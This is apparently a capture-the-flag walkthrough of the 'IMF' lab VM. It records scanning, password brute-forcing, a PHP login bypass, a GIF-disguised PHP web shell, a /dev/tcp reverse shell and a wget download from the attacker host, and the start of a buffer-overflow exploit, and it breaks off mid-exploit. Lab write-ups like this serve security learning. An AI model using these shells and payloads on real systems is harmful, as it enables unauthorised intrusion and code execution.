Very nice machine! A lot of different techniques involved there….
finding the target first:
root@kali:~# nmap -Pn -T4 192.168.1.0/24
Nmap scan report for imf.lan (192.168.1.234)
Host is up (0.00037s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE
80/tcp open http
MAC Address: 08:00:27:B1:4D:87 (Oracle VirtualBox virtual NIC)
Then lauching an intensive scan while I inspect the website:
It shows only port 80 …
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 64 Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: IMF – Homepage
MAC Address: 08:00:27:B1:4D:87 (Oracle VirtualBox virtual NIC)
Except one contact form, not much for now… So let’s enumerate:
root@kali:~# gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt –url http://192.168.1.234
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://192.168.1.234
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2019/09/18 13:00:36 Starting gobuster
===============================================================
/images (Status: 301)
/css (Status: 301)
/js (Status: 301)
/fonts (Status: 301)
/less (Status: 301)
/server-status (Status: 403)
===============================================================
2019/09/18 13:01:40 Finished
===============================================================
root@kali:~# nikto -url http://192.168.1.234
– Nikto v2.1.6
—————————————————————————
+ Target IP: 192.168.1.234
+ Target Hostname: 192.168.1.234
+ Target Port: 80
+ Start Time: 2019-09-18 13:04:33 (GMT0)
—————————————————————————
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use ‘-C all’ to force check all possible dirs)
+ IP address found in the ‘location’ header. The IP is “127.0.1.1”.
+ OSVDB-630: The web server may reveal its internal or real IP in the Location header via a request to /images over HTTP/1.0. The value is “127.0.1.1”.
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7915 requests: 0 error(s) and 8 item(s) reported on remote host
+ End Time: 2019-09-18 13:05:22 (GMT0) (49 seconds)
—————————————————————————
Checking if a flag is in the images:
root@kali:~/boxes/imf# /root/tools/stegextract/stegextract roundlogo.png
Detected image format: PNG
No trailing data found in file
Performing deep analysis
Done
root@kali:~/boxes/imf# /root/tools/stegextract/stegextract brain.jpg
Detected image format: JPG
No trailing data found in file
Performing deep analysis
Done
Nothing there, so trying the contact form with burp:
POST /contact.php HTTP/1.1
Host: 192.168.1.234
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.234/contact.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 57
Connection: close
Upgrade-Insecure-Requests: 1
email=erik%40erik.com&name=philippe&comments=test+comment
Trying different options but no results for now…
But I just thought about something! The first flag is Base64 encoded!
If I decode it, I have:
allthefiles
So let’s try this :
http://192.168.1.234/allthefiles
Crap 404 not found!
Changing IP range due to a location change… target is now 192.168.0.18
and my Kali is 192.168.0.11
root@kali:~/boxes/imf# dotdotpwn -m http -h 192.168.1.18 -M POST
#################################################################################
# #
# CubilFelino Chatsubo #
# Security Research Lab and [(in)Security Dark] Labs #
# chr1x.sectester.net chatsubo-labs.blogspot.com #
# #
# pr0udly present: #
# #
# ________ __ ________ __ __________ #
# \______ \ ____ _/ |_\______ \ ____ _/ |_\______ \__ _ __ ____ #
# | | \ / _ \\ __\| | \ / _ \\ __\| ___/\ \/ \/ // \ #
# | ` \( <_> )| | | ` \( <_> )| | | | \ /| | \ #
# /_______ / \____/ |__| /_______ / \____/ |__| |____| \/\_/ |___| / #
# \/ \/ \/ #
# – DotDotPwn v3.0.2 – #
# The Directory Traversal Fuzzer #
# http://dotdotpwn.sectester.net #
# dotdotpwn@sectester.net #
# #
# by chr1x & nitr0us #
#################################################################################
[+] Report name: Reports/192.168.1.18_09-19-2019_10-21.txt
[========== TARGET INFORMATION ==========]
[+] Hostname: 192.168.1.18
[+] Protocol: http
[+] Port: 80
[=========== TRAVERSAL ENGINE ===========]
[+] Creating Traversal patterns (mix of dots and slashes)
[+] Multiplying 6 times the traversal patterns (-d switch)
[+] Creating the Special Traversal patterns
[+] Translating (back)slashes in the filenames
[+] Adapting the filenames according to the OS type detected (unix)
[+] Including Special sufixes
[+] Traversal Engine DONE ! – Total traversal tests created: 11028
[=========== TESTING RESULTS ============]
[+] Ready to launch 3.33 traversals per second
[+] Press Enter to start the testing (You can stop it pressing Ctrl + C)
[+] Fuzz testing finished after 2.15 minutes (129 seconds)
[+] Total Traversals found (so far): 0
[-] Web server (192.168.1.18) didn’t respond !
Let’s go back to the first flag that says allthefiles….
So I checked the source of the page and found some js scripts with weird names:
<script src=”js/ZmxhZzJ7YVcxbVl.js“></script>
<script src=”js/XUnRhVzVwYzNS.js“></script>
<script src=”js/eVlYUnZjZz09fQ==.min.js“></script>
It looks like base64!
flag2{aW1mYWRtaW5pc3RyYXRvcg==}
Base64 decoded, it is imfadministrator
So I tried: http://192.168.0.18/imfadministrator/
and got a login page!
Source of the page is interesting… I have now a name!
<form method=”POST” action=””>
<label>Username:</label><input type=”text” name=”user” value=””><br />
<label>Password:</label><input type=”password” name=”pass” value=””><br />
<input type=”submit” value=”Login”>
<!– I couldn’t get the SQL working, so I hard-coded the password. It’s still mad secure through. – Roger –>
</form>
Let’s see if this can be injected:
sqlmap -u “http://192.168.0.18/imfadministrator” –data “user=erik&pass=password” –dbs –threads=10 –random-agent –dbms mysql
Seems that is it not injectable….
I tried hydra but no result for now..
Let’s try roger and test
Interesting:
So I went back to the contact page and tried different names I found. Nothing.
Then I see that Roger’s name is
Roger S. Michaels
So if I try rmichaels:
So rmichaels is the user…
I can now retry hydra:
root@kali:~/boxes/imf# hydra -l rmichaels -P /usr/share/seclists/Passwords/darkc0de.txt 192.168.0.18 http-post-form “/imfadministrator:user=^USER^&pass=^PASS^:S=302”
Hydra v9.0 (c) 2019 by van Hauser/THC – Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2019-09-19 13:56:15
[DATA] max 16 tasks per 1 server, overall 16 tasks, 1471056 login tries (l:1/p:1471056), ~91941 tries per task
[DATA] attacking http-post-form://192.168.0.18:80/imfadministrator:user=^USER^&pass=^PASS^:S=302
[80][http-post-form] host: 192.168.0.18 login: rmichaels password: 017731264n6
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2019-09-19 13:56:39
Didn’t work!!!!!
So the code is in PHP….
After a lot of googling, I found this:
https://stackoverflow.com/questions/1885979/php-get-variable-array-injection?source=post_page—–49be86323082———————-
So i tried with Burp:
POST /imfadministrator/ HTTP/1.1
Host: 192.168.0.18
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.0.18/imfadministrator/
Content-Type: application/x-www-form-urlencoded
Content-Length: 22
Cookie: PHPSESSID=7colm2p1mfl8ga2tev7ne6rlj0
Connection: close
Upgrade-Insecure-Requests: 1
user=rmichaels&pass[]=
Bingo!
HTTP/1.1 200 OK
Date: Thu, 19 Sep 2019 17:16:14 GMT
Server: Apache/2.4.18 (Ubuntu)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 100
Connection: close
Content-Type: text/html; charset=UTF-8
flag3{Y29udGludWVUT2Ntcw==}<br />Welcome, rmichaels<br /><a href=’cms.php?pagename=home’>IMF CMS</a>
It says continueTOcms
Now If I go back to Firefox:
The desavowed list link to:
Upload Report says: In construction
Nothing in the REDACTED image:
root@kali:~/boxes/imf# /root/tools/stegextract/stegextract redacted.jpg
Detected image format: JPG
No trailing data found in file
Performing deep analysis
Done
sqlmap –url http://192.168.0.18/imfadministrator/cms.php?pagename=home –dump –method POST
Found another page in the database (table pages)
http://192.168.0.18/imfadministrator/cms.php?pagename=tutorials-incomplete
There’s a QR Code in the picture: Flag4 !
flag4{dXBsb2Fkcjk0Mi5waHA=}
Decoded, we have: uploadr942.php
I tried to upload a reverse php shell:
Intelligence Upload Form
Error: Invalid file type.
So i renamed it to .jpg:
Intelligence Upload Form
Error: CrappyWAF detected malware. Signature: exec function php detected
OK so I need to hide my code!
Let’s try a GIF and no exec:
GIF89a
<?php $cmd=$_GET[‘cmd’]; print(`$cmd`); ?>
I uploaded 1234.gif and it worked.. but when I try to find the file, I have a 404.
So let’s go back to the upload page result:
<html>
<head>
<title>File Uploader</title>
</head>
<body>
<h1>Intelligence Upload Form</h1>
File successfully uploaded.
<!– 6037118aaa39 –><form id=”Upload” action=”” enctype=”multipart/form-data” method=”post”>
<p>
<label for=”file”>File to upload:</label>
<input id=”file” type=”file” name=”file”>
</p>
<p>
<input id=”submit” type=”submit” name=”submit” value=”Upload”>
</p>
</form>
</body>
</html>
It seems like it renamed my file!
So let’s try to browse to:
http://192.168.0.18/imfadministrator/uploads/6037118aaa39.gif?cmd=id
Bingo, I have code execution!
If I do an ls%20-al:
GIF89a
total 108
drwxr-xr-x 2 www-data www-data 4096 Sep 20 11:55 .
drwxr-xr-x 4 www-data www-data 4096 Oct 17 2016 ..
-rw-r–r– 1 www-data www-data 82 Oct 12 2016 .htaccess
-rw-r–r– 1 www-data www-data 50 Sep 20 11:53 3da1c1eeec42.gif
-rw-r–r– 1 www-data www-data 50 Sep 20 11:55 6037118aaa39.gif
-rw-r–r– 1 www-data www-data 83407 Sep 20 11:36 b2634466ab8e.jpg
-rw-r–r– 1 www-data www-data 28 Oct 12 2016 flag5_abc123def.txt
As you can see I did try multiple times!!!!!!
So let’s catch the flag first:
http://192.168.0.18/imfadministrator/uploads/6037118aaa39.gif?cmd=cat%20flag5_abc123def.txt
flag5{YWdlbnRzZXJ2aWNlcw==}
it decodes as agentservices
http://192.168.0.18/imfadministrator/uploads/6037118aaa39.gif?cmd=%75%6e%61%6d%65%20%2d%61
GIF89aLinux imf 4.4.0-45-generic #66-Ubuntu SMP Wed Oct 19 14:12:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
Let’s try now:
/bin/sh -i >& /dev/tcp/192.168.0.11/8080 0>&1
URL encoded:
%2f%62%69%6e%2f%73%68%20%2d%69%20%3e%26%20%2f%64%65%76%2f%74%63%70%2f%31%39%32%2e%31%36%38%2e%30%2e%31%31%2f%38%30%38%30%20%30%3e%26%31
Didn’t work!
Let’s try differently:
I have a php reverse shell from PenTestMonkeys:
So I started an http server on kali:
python -m SimpleHTTPServer 9000
Then on the target:
http://192.168.0.18/imfadministrator/uploads/6037118aaa39.gif?cmd=wget%20192.168.0.11:9000/reverse2.php
Then on kali, I start netcat:
nc -nvlp 4444
Then on the target:
192.168.0.18/imfadministrator/uploads/reverse2.php
Bingo! a shell!
root@kali:~/tools/shells# nc -nvlp 4444
listening on [any] 4444 …
connect to [192.168.0.11] from (UNKNOWN) [192.168.0.18] 53416
Linux imf 4.4.0-45-generic #66-Ubuntu SMP Wed Oct 19 14:12:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
13:03:49 up 24 min, 0 users, load average: 0.15, 0.11, 0.09
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can’t access tty; job control turned off
Now upgrading to a proper TTY:
python3 -c ‘import pty; pty.spawn(“/bin/bash”)’
CTRL Z
stty raw -echo
fg and two times ENTER
export TERM=screen
reset
$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
mysql:x:107:111:MySQL Server,,,:/nonexistent:/bin/false
messagebus:x:108:112::/var/run/dbus:/bin/false
uuidd:x:109:113::/run/uuidd:/bin/false
dnsmasq:x:110:65534:dnsmasq,,,:/var/lib/misc:/bin/false
sshd:x:111:65534::/var/run/sshd:/usr/sbin/nologin
setup:x:1000:1000:setup,,,:/home/setup:/bin/bash
Let’s go back to he website for now to try to have passwords. in the index.php file I found:
398fj289fj2389fj398fjhhds^&#hkseifw3893h#(&$$*838hjf
for rmichaels… This was the hardcoded passord…
But actually rmichaels is not in /etc/passwd …. useless info!
Uploading linenum on the target then running it:
$ wget http://192.168.0.11/linenum.sh
–2019-09-23 07:45:31– http://192.168.0.11/linenum.sh
Connecting to 192.168.0.11:80… failed: Connection refused.
$ wget http://192.168.0.11:9000/linenum.sh
–2019-09-23 07:45:45– http://192.168.0.11:9000/linenum.sh
Connecting to 192.168.0.11:9000… connected.
HTTP request sent, awaiting response… 200 OK
Length: 45652 (45K) [text/x-sh]
Saving to: ‘linenum.sh’
0K ………. ………. ………. ………. …. 100% 132K=0.3s
2019-09-23 07:45:45 (132 KB/s) – ‘linenum.sh’ saved [45652/45652]
$ chmod +x linenum.sh
$ ./linenum.sh -t > scan.txt
### SYSTEM ##############################################
[-] Kernel information:
Linux imf 4.4.0-45-generic #66-Ubuntu SMP Wed Oct 19 14:12:37 UTC 2016 x86_64 x8
6_64 x86_64 GNU/Linux
[-] Kernel information (continued):
Linux version 4.4.0-45-generic (buildd@lgw01-34) (gcc version 5.4.0 20160609 (Ub
untu 5.4.0-6ubuntu1~16.04.2) ) #66-Ubuntu SMP Wed Oct 19 14:12:37 UTC 2016
[-] Specific release information:
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=16.04
DISTRIB_CODENAME=xenial
DISTRIB_DESCRIPTION=”Ubuntu 16.04.1 LTS”
NAME=”Ubuntu”
VERSION=”16.04.1 LTS (Xenial Xerus)”
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME=”Ubuntu 16.04.1 LTS”
VERSION_ID=”16.04″
HOME_URL=”http://www.ubuntu.com/”
SUPPORT_URL=”http://help.ubuntu.com/”
BUG_REPORT_URL=”http://bugs.launchpad.net/ubuntu/”
UBUNTU_CODENAME=xenial
Checking if there’s any vulnerability with exploitdb.
Tried: Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) – Local Privilege Escalation
Not working..
Interesting job:
root 1086 2.8 0.2 8752 2196 ? Ss 07:39 0:12 /usr/sbin/knockd -d
[-] Listening TCP:
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN –
tcp 0 0 0.0.0.0:7788 0.0.0.0:* LISTEN –
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN –
tcp6 0 0 :::80 :::* LISTEN –
tcp6 0 0 :::22 :::* LISTEN –
Now the problem is that I cannot read the knock.conf file….
knockd -l
/etc/knockd.conf: Permission denied
www-data@imf:/etc/xinetd.d$ cat agent
# default: on
# description: The agent server serves agent sessions
# unencrypted agentid for authentication.
service agent
{
flags = REUSE
socket_type = stream
wait = no
user = root
server = /usr/local/bin/agent
log_on_failure += USERID
disable = no
port = 7788
}
Hum, actually if I telnet port 7788, I have something!
telnet localhost 7788
]Trying ::1…
Trying 127.0.0.1…
Connected to localhost.
Escape character is ‘^]’.
___ __ __ ___
|_ _| \/ | __| Agent
| || |\/| | _| Reporting
|___|_| |_|_| System
Agent ID :
But cannot login….
Checking if there’s a local program running:
www-data@imf:/usr/local/bin$ ll
total 24
drwxr-xr-x 2 root root 4096 Oct 16 2016 .
drwxr-xr-x 10 root root 4096 Sep 22 2016 ..
-rw-r–r– 1 root root 19 Oct 16 2016 access_codes
-rwxr-xr-x 1 root root 11896 Oct 12 2016 agent
www-data@imf:/usr/local/bin$ cat access_codes
SYN 7482,8279,9467
Hum I might have the knock sequence here!
nmap -sS –max-retries 0 -T5 -p 7482,8279,9467 192.168.0.18
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-23 13:53 UTC
Warning: 192.168.0.18 giving up on port because retransmission cap hit (0).
Nmap scan report for 192.168.0.18
Host is up (0.00043s latency).
PORT STATE SERVICE
7482/tcp filtered unknown
8279/tcp filtered unknown
9467/tcp filtered unknown
And now if I rescan the target:
root@kali:~/boxes/imf# nmap -p- 192.168.0.18
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-23 13:54 UTC
Nmap scan report for 192.168.0.18
Host is up (0.00049s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE
80/tcp open http
7788/tcp open unknown
MAC Address: 08:00:27:B1:4D:87 (Oracle VirtualBox virtual NIC)
But it actually just present me with what I already had! So useless
Going back to agent. I tired to upload it to my kali with a python http server but somehow it doesn’t work..
so
cp agent /var/www/html/imfadministrator/uploads
Then I downloaded it through the browser….
Now trying to decompile..
I run it with EDB and added a breakpoint where the Agent ID is evaluated:
And I have a code in the stack: 48093572
I tried it on the target, and it worked!
www-data@imf:/usr/local/bin$ ./agent
___ __ __ ___
|_ _| \/ | __| Agent
| || |\/| | _| Reporting
|___|_| |_|_| System
Agent ID : 48093572
Login Validated
Main Menu:
1. Extraction Points
2. Request Extraction
3. Submit Report
0. Exit
Enter selection:
Extraction Points:
Staatsoper, Vienna, Austria
Blenheim Palace, Woodstock, Oxfordshire, England, UK
Great Windmill Street, Soho, London, England, UK
Fawley Power Station, Southampton, England, UK
Underground Station U4 Schottenring, Vienna, Austria
Old Town Square, Old Town, Prague, Czech Republic
Drake Hotel – 140 E. Walton Pl., Near North Side, Chicago, Illinois, USA
Ashton Park, Mosman, Sydney, New South Wales, Australia
Argyle Place, The Rocks, Sydney, New South Wales, Australia
www-data@imf:/usr/local/bin$ 2
2: command not found
www-data@imf:/usr/local/bin$ ./agent
___ __ __ ___
|_ _| \/ | __| Agent
| || |\/| | _| Reporting
|___|_| |_|_| System
Agent ID : 48093572
Login Validated
Main Menu:
1. Extraction Points
2. Request Extraction
3. Submit Report
0. Exit
Enter selection: 2
Extraction Request
Enter extraction location: Underground Station U4 Schottenring, Vienna, Austria
e
Location: Underground Station U4 Schottenring, Vienna, Austria
Extraction team has been deployed.
www-data@imf:/usr/local/bin$ ./agent
___ __ __ ___
|_ _| \/ | __| Agent
| || |\/| | _| Reporting
|___|_| |_|_| System
Agent ID : 48093572
Login Validated
Main Menu:
1. Extraction Points
2. Request Extraction
3. Submit Report
0. Exit
Enter selection: 3
Enter report update: 1234
Report: 1234
Submitted for review.
Trying a Buffer Overflow:
First thing:
echo 0 > /proc/sys/kernel/randomize_va_space
Agent ID : 48093572
Login Validated
Main Menu:
1. Extraction Points
2. Request Extraction
3. Submit Report
0. Exit
Enter selection: 3
Enter report update: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Report: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Submitted for review.
Segmentation fault (core dumped)
BINGO!
So running it with GDB on Kali:
Enter report update: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Report: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Submitted for review.
Program received signal SIGSEGV, Segmentation fault.
[———————————-registers———————————–]
EAX: 0xffffd254 (‘a’ <repeats 152 times>, “T\322\377\377”, ‘a’ <repeats 44 times>…)
EBX: 0x0
ECX: 0xf7fa4890 –> 0x0
EDX: 0x16
ESI: 0xf7fa3000 –> 0x1d9d6c
EDI: 0xf7fa3000 –> 0x1d9d6c
EBP: 0x61616161 (‘aaaa’)
ESP: 0xffffd300 (‘a’ <repeats 200 times>…)
EIP: 0x61616161 (‘aaaa’)
EFLAGS: 0x10286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)
[————————————-code————————————-]
Invalid $PC address: 0x61616161
[————————————stack————————————-]
0000| 0xffffd300 (‘a’ <repeats 200 times>…)
0004| 0xffffd304 (‘a’ <repeats 200 times>…)
0008| 0xffffd308 (‘a’ <repeats 200 times>…)
0012| 0xffffd30c (‘a’ <repeats 200 times>…)
0016| 0xffffd310 (‘a’ <repeats 200 times>…)
0020| 0xffffd314 (‘a’ <repeats 200 times>…)
0024| 0xffffd318 (‘a’ <repeats 200 times>…)
0028| 0xffffd31c (‘a’ <repeats 200 times>…)
[——————————————————————————]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x61616161 in ?? ()
So I create a unique patern using metasploit:
root@kali:~/boxes/imf# /usr/bin/msf-pattern_create -l 300 > unique.txt
Enter report update: Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9
Report: Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9
Submitted for review.
Program received signal SIGSEGV, Segmentation fault.
Main Menu:
1. Extraction Points
2. Request Extraction
3. Submit Report
0. Exit
Enter selection: 3
Enter report update: Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9
